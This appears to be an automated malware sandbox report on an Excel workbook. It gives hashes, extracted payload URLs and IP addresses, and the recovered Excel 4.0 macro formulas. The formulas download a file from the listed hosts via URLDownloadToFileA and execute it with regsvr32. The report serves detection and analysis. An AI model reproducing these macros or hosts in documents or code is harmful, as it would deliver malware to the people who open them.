Static task
static1
Behavioral task
behavioral1
Sample
3f3fba614ffdadd7ed4b25f4d3d7cc51d8e89540f20ff9c0e584ae79c8db1647.xlsx
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
3f3fba614ffdadd7ed4b25f4d3d7cc51d8e89540f20ff9c0e584ae79c8db1647.xlsx
Resource
win10v2004-20240802-en
General
-
Target
3f3fba614ffdadd7ed4b25f4d3d7cc51d8e89540f20ff9c0e584ae79c8db1647
-
Size
42KB
-
MD5
50d2bd5ff25e514cd75373a1bc44c01f
-
SHA1
7191911374d17df365586d778e803f9cfdaef4a1
-
SHA256
3f3fba614ffdadd7ed4b25f4d3d7cc51d8e89540f20ff9c0e584ae79c8db1647
-
SHA512
efdf46325990a2575d86f483d673dfbed6dc76c7de9a9841cc15bda77421170da1842f67c0660397b05b50468301eaafee8f2b69b5eb5a3bb96f1b17398e8361
-
SSDEEP
768:8CwaDFg6ixC1AVbl6fGeXZXjHQTV2LFHVBzcR0P+664n3NxCBs:pwaCpCTfJX9jwe1BwGPDzxCBs
Malware Config
Extracted
http://www.agretto.com/Template/ziasuz5w8pS08Gm2/
http://www.agnesleung.com/raw.backup/j4ry/
https://lifebotl.com/Response/WllkQWM/
https://livejagat.com/h/SjpRvD/
http://185.187.70.35/wordpress_bo/srvoaI2MBFc/
http://188.166.245.112/sipadu/eFi8UiJETZiK1FB/
http://103.85.95.5/v1/uploads/87DtpAEZULSccOn/
-
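formulas (Excel 4.0 macro cells recovered from the workbook: the CALL entries use urlmon's URLDownloadToFileA to fetch a payload from the URLs listed above into ..\wn.ocx, and the EXEC entry then loads that file with regsvr32 -s, so Excel spawning regsvr32.exe and a newly written wn.ocx are the host-side indicators)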
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agretto.com/Template/ziasuz5w8pS08Gm2/","..\wn.ocx",0,0) =IF('KEFGK'!E7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agnesleung.com/raw.backup/j4ry/","..\wn.ocx",0,0)) =IF('KEFGK'!E9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lifebotl.com/Response/WllkQWM/","..\wn.ocx",0,0)) =IF('KEFGK'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://livejagat.com/h/SjpRvD/","..\wn.ocx",0,0)) =IF('KEFGK'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://185.187.70.35/wordpress_bo/srvoaI2MBFc/","..\wn.ocx",0,0)) =IF('KEFGK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://185.187.70.35/wordpress_bo/srvoaI2MBFc/","..\wn.ocx",0,0)) =IF('KEFGK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://188.166.245.112/sipadu/eFi8UiJETZiK1FB/","..\wn.ocx",0,0)) =IF('KEFGK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://103.85.95.5/v1/uploads/87DtpAEZULSccOn/","..\wn.ocx",0,0)) =IF('KEFGK'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wn.ocx") =RETURN()
Signatures
Files
-
3f3fba614ffdadd7ed4b25f4d3d7cc51d8e89540f20ff9c0e584ae79c8db1647.xlsx office2007